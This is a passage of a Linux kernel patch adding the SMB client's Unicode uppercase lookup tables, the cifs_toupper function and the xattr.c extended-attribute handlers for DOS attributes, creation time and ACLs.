++	0x0000, 0xa690, 0x0000, 0xa692, 0x0000, 0xa694, 0x0000, 0xa696,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_a7[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0xa722, 0x0000, 0xa724, 0x0000, 0xa726,
++	0x0000, 0xa728, 0x0000, 0xa72a, 0x0000, 0xa72c, 0x0000, 0xa72e,
++	0x0000, 0x0000, 0x0000, 0xa732, 0x0000, 0xa734, 0x0000, 0xa736,
++	0x0000, 0xa738, 0x0000, 0xa73a, 0x0000, 0xa73c, 0x0000, 0xa73e,
++	0x0000, 0xa740, 0x0000, 0xa742, 0x0000, 0xa744, 0x0000, 0xa746,
++	0x0000, 0xa748, 0x0000, 0xa74a, 0x0000, 0xa74c, 0x0000, 0xa74e,
++	0x0000, 0xa750, 0x0000, 0xa752, 0x0000, 0xa754, 0x0000, 0xa756,
++	0x0000, 0xa758, 0x0000, 0xa75a, 0x0000, 0xa75c, 0x0000, 0xa75e,
++	0x0000, 0xa760, 0x0000, 0xa762, 0x0000, 0xa764, 0x0000, 0xa766,
++	0x0000, 0xa768, 0x0000, 0xa76a, 0x0000, 0xa76c, 0x0000, 0xa76e,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0xa779, 0x0000, 0xa77b, 0x0000, 0x0000, 0xa77e,
++	0x0000, 0xa780, 0x0000, 0xa782, 0x0000, 0xa784, 0x0000, 0xa786,
++	0x0000, 0x0000, 0x0000, 0x0000, 0xa78b, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t t2_ff[256] = {
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0xff21, 0xff22, 0xff23, 0xff24, 0xff25, 0xff26, 0xff27,
++	0xff28, 0xff29, 0xff2a, 0xff2b, 0xff2c, 0xff2d, 0xff2e, 0xff2f,
++	0xff30, 0xff31, 0xff32, 0xff33, 0xff34, 0xff35, 0xff36, 0xff37,
++	0xff38, 0xff39, 0xff3a, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++	0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
++};
++
++static const wchar_t *const toplevel[256] = {
++	t2_00, t2_01, t2_02, t2_03, t2_04, t2_05,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL, t2_1d, t2_1e, t2_1f,
++	NULL, t2_21,  NULL,  NULL, t2_24,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL, t2_2c, t2_2d,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL, t2_a6, t2_a7,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL,
++	NULL,  NULL,  NULL,  NULL,  NULL,  NULL,  NULL, t2_ff,
++};
++
++/**
++ * cifs_toupper - convert a wchar_t from lower to uppercase
++ * @in: character to convert from lower to uppercase
++ *
++ * This function consults the static tables above to convert a wchar_t from
++ * lower to uppercase. In the event that there is no mapping, the original
++ * "in" character is returned.
++ */
++wchar_t
++cifs_toupper(wchar_t in)
++{
++	unsigned char idx;
++	const wchar_t *tbl;
++	wchar_t out;
++
++	/* grab upper byte */
++	idx = (in & 0xff00) >> 8;
++
++	/* find pointer to 2nd layer table */
++	tbl = toplevel[idx];
++	if (!tbl)
++		return in;
++
++	/* grab lower byte */
++	idx = in & 0xff;
++
++	/* look up character in table */
++	out = tbl[idx];
++	if (out)
++		return out;
++
++	return in;
++}
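++
++/*
++ * Worked example of the two-level lookup: for U+1F51 (GREEK SMALL LETTER
++ * UPSILON WITH DASIA) the high byte 0x1f selects t2_1f, and the low byte
++ * 0x51 indexes entry 0x1f59, its uppercase form.  A minimal sketch
++ * exercising a few representative code points (illustrative only; no such
++ * self-test is wired up by this file):
++ *
++ *	WARN_ON(cifs_toupper(0x0061) != 0x0041);  ASCII 'a' -> 'A' via t2_00
++ *	WARN_ON(cifs_toupper(0x1f51) != 0x1f59);  via t2_1f, low byte 0x51
++ *	WARN_ON(cifs_toupper(0x0041) != 0x0041);  no mapping: input returned
++ */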
+diff --git a/fs/smb/client/xattr.c b/fs/smb/client/xattr.c
+new file mode 100644
+index 0000000000000..998fa51f9b684
+--- /dev/null
++++ b/fs/smb/client/xattr.c
+@@ -0,0 +1,555 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (c) International Business Machines  Corp., 2003, 2007
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include <linux/fs.h>
++#include <linux/posix_acl_xattr.h>
++#include <linux/slab.h>
++#include <linux/xattr.h>
++#include "cifsfs.h"
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_debug.h"
++#include "cifs_fs_sb.h"
++#include "cifs_unicode.h"
++#include "cifs_ioctl.h"
++
++#define MAX_EA_VALUE_SIZE CIFSMaxBufSize
++#define CIFS_XATTR_CIFS_ACL "system.cifs_acl" /* DACL only */
++#define CIFS_XATTR_CIFS_NTSD "system.cifs_ntsd" /* owner plus DACL */
++#define CIFS_XATTR_CIFS_NTSD_FULL "system.cifs_ntsd_full" /* owner/DACL/SACL */
++#define CIFS_XATTR_ATTRIB "cifs.dosattrib"  /* full name: user.cifs.dosattrib */
++#define CIFS_XATTR_CREATETIME "cifs.creationtime"  /* user.cifs.creationtime */
++/*
++ * Although the following are just aliases for the above, we need to move away
++ * from confusing users with the 20+ year old term 'cifs' now that it is no
++ * longer secure, having been replaced by SMB2 (and the even more secure SMB3)
++ * many years ago.
++ */
++#define SMB3_XATTR_CIFS_ACL "system.smb3_acl" /* DACL only */
++#define SMB3_XATTR_CIFS_NTSD "system.smb3_ntsd" /* owner plus DACL */
++#define SMB3_XATTR_CIFS_NTSD_FULL "system.smb3_ntsd_full" /* owner/DACL/SACL */
++#define SMB3_XATTR_ATTRIB "smb3.dosattrib"  /* full name: user.smb3.dosattrib */
++#define SMB3_XATTR_CREATETIME "smb3.creationtime"  /* user.smb3.creationtime */
++/* BB need to add server (Samba e.g) support for security and trusted prefix */
++
++enum { XATTR_USER, XATTR_CIFS_ACL, XATTR_ACL_ACCESS, XATTR_ACL_DEFAULT,
++	XATTR_CIFS_NTSD, XATTR_CIFS_NTSD_FULL };
++
++static int cifs_attrib_set(unsigned int xid, struct cifs_tcon *pTcon,
++			   struct inode *inode, const char *full_path,
++			   const void *value, size_t size)
++{
++	ssize_t rc = -EOPNOTSUPP;
++	__u32 *pattrib = (__u32 *)value;
++	__u32 attrib;
++	FILE_BASIC_INFO info_buf;
++
++	if ((value == NULL) || (size != sizeof(__u32)))
++		return -ERANGE;
++
++	memset(&info_buf, 0, sizeof(info_buf));
++	attrib = *pattrib;
++	info_buf.Attributes = cpu_to_le32(attrib);
++	if (pTcon->ses->server->ops->set_file_info)
++		rc = pTcon->ses->server->ops->set_file_info(inode, full_path,
++				&info_buf, xid);
++	if (rc == 0)
++		CIFS_I(inode)->cifsAttrs = attrib;
++
++	return rc;
++}
++
++static int cifs_creation_time_set(unsigned int xid, struct cifs_tcon *pTcon,
++				  struct inode *inode, const char *full_path,
++				  const void *value, size_t size)
++{
++	ssize_t rc = -EOPNOTSUPP;
++	__u64 *pcreation_time = (__u64 *)value;
++	__u64 creation_time;
++	FILE_BASIC_INFO info_buf;
++
++	if ((value == NULL) || (size != sizeof(__u64)))
++		return -ERANGE;
++
++	memset(&info_buf, 0, sizeof(info_buf));
++	creation_time = *pcreation_time;
++	info_buf.CreationTime = cpu_to_le64(creation_time);
++	if (pTcon->ses->server->ops->set_file_info)
++		rc = pTcon->ses->server->ops->set_file_info(inode, full_path,
++				&info_buf, xid);
++	if (rc == 0)
++		CIFS_I(inode)->createtime = creation_time;
++
++	return rc;
++}
++
++static int cifs_xattr_set(const struct xattr_handler *handler,
++			  struct user_namespace *mnt_userns,
++			  struct dentry *dentry, struct inode *inode,
++			  const char *name, const void *value,
++			  size_t size, int flags)
++{
++	int rc = -EOPNOTSUPP;
++	unsigned int xid;
++	struct super_block *sb = dentry->d_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	const char *full_path;
++	void *page;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	pTcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++	page = alloc_dentry_path();
++
++	full_path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++	/* return dos attributes as pseudo xattr */
++	/* return alt name if available as pseudo attr */
++
++	/*
++	 * if proc/fs/cifs/streamstoxattr is set then search server for EAs
++	 * or streams to return as xattrs
++	 */
++	if (size > MAX_EA_VALUE_SIZE) {
++		cifs_dbg(FYI, "size of EA value too large\n");
++		rc = -EOPNOTSUPP;
++		goto out;
++	}
++
++	switch (handler->flags) {
++	case XATTR_USER:
++		cifs_dbg(FYI, "%s:setting user xattr %s\n", __func__, name);
++		if ((strcmp(name, CIFS_XATTR_ATTRIB) == 0) ||
++		    (strcmp(name, SMB3_XATTR_ATTRIB) == 0)) {
++			rc = cifs_attrib_set(xid, pTcon, inode, full_path,
++					value, size);
++			if (rc == 0) /* force revalidate of the inode */
++				CIFS_I(inode)->time = 0;
++			break;
++		} else if ((strcmp(name, CIFS_XATTR_CREATETIME) == 0) ||
++			   (strcmp(name, SMB3_XATTR_CREATETIME) == 0)) {
++			rc = cifs_creation_time_set(xid, pTcon, inode,
++					full_path, value, size);
++			if (rc == 0) /* force revalidate of the inode */
++				CIFS_I(inode)->time = 0;
++			break;
++		}
++
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
++			goto out;
++
++		if (pTcon->ses->server->ops->set_EA)
++			rc = pTcon->ses->server->ops->set_EA(xid, pTcon,
++				full_path, name, value, (__u16)size,
++				cifs_sb->local_nls, cifs_sb);
++		break;
++
++	case XATTR_CIFS_ACL:
++	case XATTR_CIFS_NTSD:
++	case XATTR_CIFS_NTSD_FULL: {
++		struct cifs_ntsd *pacl;
++
++		if (!value)
++			goto out;
++		pacl = kmalloc(size, GFP_KERNEL);
++		if (!pacl) {
++			rc = -ENOMEM;
++		} else {
++			memcpy(pacl, value, size);
++			if (pTcon->ses->server->ops->set_acl) {
++				int aclflags = 0;
++				rc = 0;
++
++				switch (handler->flags) {
++				case XATTR_CIFS_NTSD_FULL:
++					aclflags = (CIFS_ACL_OWNER |
++						    CIFS_ACL_GROUP |
++						    CIFS_ACL_DACL |
++						    CIFS_ACL_SACL);
++					break;
++				case XATTR_CIFS_NTSD:
++					aclflags = (CIFS_ACL_OWNER |
++						    CIFS_ACL_GROUP |
++						    CIFS_ACL_DACL);
++					break;
++				case XATTR_CIFS_ACL:
++				default:
++					aclflags = CIFS_ACL_DACL;
++				}
++
++				rc = pTcon->ses->server->ops->set_acl(pacl,
++					size, inode, full_path, aclflags);
++			} else {
++				rc = -EOPNOTSUPP;
++			}
++			if (rc == 0) /* force revalidate of the inode */
++				CIFS_I(inode)->time = 0;
++			kfree(pacl);
++		}
++		break;
++	}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	case XATTR_ACL_ACCESS:
++#ifdef CONFIG_CIFS_POSIX
++		if (!value)
++			goto out;
++		if (sb->s_flags & SB_POSIXACL)
++			rc = CIFSSMBSetPosixACL(xid, pTcon, full_path,
++				value, (const int)size,
++				ACL_TYPE_ACCESS, cifs_sb->local_nls,
++				cifs_remap(cifs_sb));
++#endif  /* CONFIG_CIFS_POSIX */
++		break;
++
++	case XATTR_ACL_DEFAULT:
++#ifdef CONFIG_CIFS_POSIX
++		if (!value)
++			goto out;
++		if (sb->s_flags & SB_POSIXACL)
++			rc = CIFSSMBSetPosixACL(xid, pTcon, full_path,
++				value, (const int)size,
++				ACL_TYPE_DEFAULT, cifs_sb->local_nls,
++				cifs_remap(cifs_sb));
++#endif  /* CONFIG_CIFS_POSIX */
++		break;
++#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	}
++
++out:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++static int cifs_attrib_get(struct dentry *dentry,
++			   struct inode *inode, void *value,
++			   size_t size)
++{
++	ssize_t rc;
++	__u32 *pattribute;
++
++	rc = cifs_revalidate_dentry_attr(dentry);
++
++	if (rc)
++		return rc;
++
++	if ((value == NULL) || (size == 0))
++		return sizeof(__u32);
++	else if (size < sizeof(__u32))
++		return -ERANGE;
++
++	/* return dos attributes as pseudo xattr */
++	pattribute = (__u32 *)value;
++	*pattribute = CIFS_I(inode)->cifsAttrs;
++
++	return sizeof(__u32);
++}
++
++static int cifs_creation_time_get(struct dentry *dentry, struct inode *inode,
++				  void *value, size_t size)
++{
++	ssize_t rc;
++	__u64 *pcreatetime;
++
++	rc = cifs_revalidate_dentry_attr(dentry);
++	if (rc)
++		return rc;
++
++	if ((value == NULL) || (size == 0))
++		return sizeof(__u64);
++	else if (size < sizeof(__u64))
++		return -ERANGE;
++
++	/* return dos attributes as pseudo xattr */
++	pcreatetime = (__u64 *)value;
++	*pcreatetime = CIFS_I(inode)->createtime;
++	return sizeof(__u64);
++}
++
++static int cifs_xattr_get(const struct xattr_handler *handler,
++			  struct dentry *dentry, struct inode *inode,
++			  const char *name, void *value, size_t size)
++{
++	ssize_t rc = -EOPNOTSUPP;
++	unsigned int xid;
++	struct super_block *sb = dentry->d_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	const char *full_path;
++	void *page;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	pTcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++	page = alloc_dentry_path();
++
++	full_path = build_path_from_dentry(dentry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto out;
++	}
++
++	/* return alt name if available as pseudo attr */
++	switch (handler->flags) {
++	case XATTR_USER:
++		cifs_dbg(FYI, "%s:querying user xattr %s\n", __func__, name);
++		if ((strcmp(name, CIFS_XATTR_ATTRIB) == 0) ||
++		    (strcmp(name, SMB3_XATTR_ATTRIB) == 0)) {
++			rc = cifs_attrib_get(dentry, inode, value, size);
++			break;
++		} else if ((strcmp(name, CIFS_XATTR_CREATETIME) == 0) ||
++		    (strcmp(name, SMB3_XATTR_CREATETIME) == 0)) {
++			rc = cifs_creation_time_get(dentry, inode, value, size);
++			break;
++		}
++
++		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
++			goto out;
++
++		if (pTcon->ses->server->ops->query_all_EAs)
++			rc = pTcon->ses->server->ops->query_all_EAs(xid, pTcon,
++				full_path, name, value, size, cifs_sb);
++		break;
++
++	case XATTR_CIFS_ACL:
++	case XATTR_CIFS_NTSD:
++	case XATTR_CIFS_NTSD_FULL: {
++		/*
++		 * fetch owner, DACL, and SACL if asked for full descriptor,
++		 * fetch owner and DACL otherwise
++		 */
++		u32 acllen, extra_info;
++		struct cifs_ntsd *pacl;
++
++		if (pTcon->ses->server->ops->get_acl == NULL)
++			goto out; /* rc already EOPNOTSUPP */
++
++		if (handler->flags == XATTR_CIFS_NTSD_FULL) {
++			extra_info = SACL_SECINFO;
++		} else {
++			extra_info = 0;
++		}
++		pacl = pTcon->ses->server->ops->get_acl(cifs_sb,
++				inode, full_path, &acllen, extra_info);
++		if (IS_ERR(pacl)) {
++			rc = PTR_ERR(pacl);
++			cifs_dbg(VFS, "%s: error %zd getting sec desc\n",
++				 __func__, rc);
++		} else {
++			/* acllen is unsigned, so report overflow via rc */
++			if (value && acllen > size) {
++				rc = -ERANGE;
++			} else {
++				if (value)
++					memcpy(value, pacl, acllen);
++				rc = acllen;
++			}
++			kfree(pacl);
++		}
++		break;
++	}
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++	case XATTR_ACL_ACCESS:
++#ifdef CONFIG_CIFS_POSIX
++		if (sb->s_flags & SB_POSIXACL)
++			rc = CIFSSMBGetPosixACL(xid, pTcon, full_path,
++				value, size, ACL_TYPE_ACCESS,
++				cifs_sb->local_nls,
++				cifs_remap(cifs_sb));
++#endif  /* CONFIG_CIFS_POSIX */
++		break;
++
++	case XATTR_ACL_DEFAULT:
++#ifdef CONFIG_CIFS_POSIX
++		if (sb->s_flags & SB_POSIXACL)
++			rc = CIFSSMBGetPosixACL(xid, pTcon, full_path,
++				value, size, ACL_TYPE_DEFAULT,
++				cifs_sb->local_nls,
++				cifs_remap(cifs_sb));
++#endif  /* CONFIG_CIFS_POSIX */
++		break;
++#endif /* ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
++	}
++
++	/*
++	 * We could add an additional check for streams, i.e. if
++	 * proc/fs/cifs/streamstoxattr is set then search server for EAs or
++	 * streams to return as xattrs
++	 */
++
++	if (rc == -EINVAL)
++		rc = -EOPNOTSUPP;
++
++out:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++ssize_t cifs_listxattr(struct dentry *direntry, char *data, size_t buf_size)
++{
++	ssize_t rc = -EOPNOTSUPP;
++	unsigned int xid;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
++	struct tcon_link *tlink;
++	struct cifs_tcon *pTcon;
++	const char *full_path;
++	void *page;
++
++	if (unlikely(cifs_forced_shutdown(cifs_sb)))
++		return -EIO;
++
++	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
++		return -EOPNOTSUPP;
++
++	tlink = cifs_sb_tlink(cifs_sb);
++	if (IS_ERR(tlink))
++		return PTR_ERR(tlink);
++	pTcon = tlink_tcon(tlink);
++
++	xid = get_xid();
++	page = alloc_dentry_path();
++
++	full_path = build_path_from_dentry(direntry, page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto list_ea_exit;
++	}
++	/* return dos attributes as pseudo xattr */
++	/* return alt name if available as pseudo attr */
++
++	/*
++	 * if proc/fs/cifs/streamstoxattr is set then search server for EAs
++	 * or streams to return as xattrs
++	 */
++
++	if (pTcon->ses->server->ops->query_all_EAs)
++		rc = pTcon->ses->server->ops->query_all_EAs(xid, pTcon,
++				full_path, NULL, data, buf_size, cifs_sb);
++list_ea_exit:
++	free_dentry_path(page);
++	free_xid(xid);
++	cifs_put_tlink(tlink);
++	return rc;
++}
++
++static const struct xattr_handler cifs_user_xattr_handler = {
++	.prefix = XATTR_USER_PREFIX,
++	.flags = XATTR_USER,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++/* os2.* attributes are treated like user.* attributes */
++static const struct xattr_handler cifs_os2_xattr_handler = {
++	.prefix = XATTR_OS2_PREFIX,
++	.flags = XATTR_USER,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++static const struct xattr_handler cifs_cifs_acl_xattr_handler = {
++	.name = CIFS_XATTR_CIFS_ACL,
++	.flags = XATTR_CIFS_ACL,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++/*
++ * Although this is just an alias for the above, we need to move away from
++ * confusing users with the 20 year old term 'cifs', which is no longer
++ * secure and was replaced by SMB2/SMB3 a long time ago; SMB3 and later
++ * are highly secure.
++ */
++static const struct xattr_handler smb3_acl_xattr_handler = {
++	.name = SMB3_XATTR_CIFS_ACL,
++	.flags = XATTR_CIFS_ACL,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++static const struct xattr_handler cifs_cifs_ntsd_xattr_handler = {
++	.name = CIFS_XATTR_CIFS_NTSD,
++	.flags = XATTR_CIFS_NTSD,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++/*
++ * Although this is just an alias for the above, we need to move away from
++ * confusing users with the 20 year old term 'cifs', which is no longer
++ * secure and was replaced by SMB2/SMB3 a long time ago; SMB3 and later
++ * are highly secure.
++ */
++static const struct xattr_handler smb3_ntsd_xattr_handler = {
++	.name = SMB3_XATTR_CIFS_NTSD,
++	.flags = XATTR_CIFS_NTSD,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++static const struct xattr_handler cifs_cifs_ntsd_full_xattr_handler = {
++	.name = CIFS_XATTR_CIFS_NTSD_FULL,
++	.flags = XATTR_CIFS_NTSD_FULL,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++/*
++ * Although this is just an alias for the above, we need to move away from
++ * confusing users with the 20 year old term 'cifs', which is no longer
++ * secure and was replaced by SMB2/SMB3 a long time ago; SMB3 and later
++ * are highly secure.
++ */
++static const struct xattr_handler smb3_ntsd_full_xattr_handler = {
++	.name = SMB3_XATTR_CIFS_NTSD_FULL,
++	.flags = XATTR_CIFS_NTSD_FULL,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++static const struct xattr_handler cifs_posix_acl_access_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_ACCESS,
++	.flags = XATTR_ACL_ACCESS,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++static const struct xattr_handler cifs_posix_acl_default_xattr_handler = {
++	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
++	.flags = XATTR_ACL_DEFAULT,
++	.get = cifs_xattr_get,
++	.set = cifs_xattr_set,
++};
++
++const struct xattr_handler *cifs_xattr_handlers[] = {
++	&cifs_user_xattr_handler,
++	&cifs_os2_xattr_handler,
++	&cifs_cifs_acl_xattr_handler,
++	&smb3_acl_xattr_handler, /* alias for above since avoiding "cifs" */
++	&cifs_cifs_ntsd_xattr_handler,
++	&smb3_ntsd_xattr_handler, /* alias for above since avoiding "cifs" */
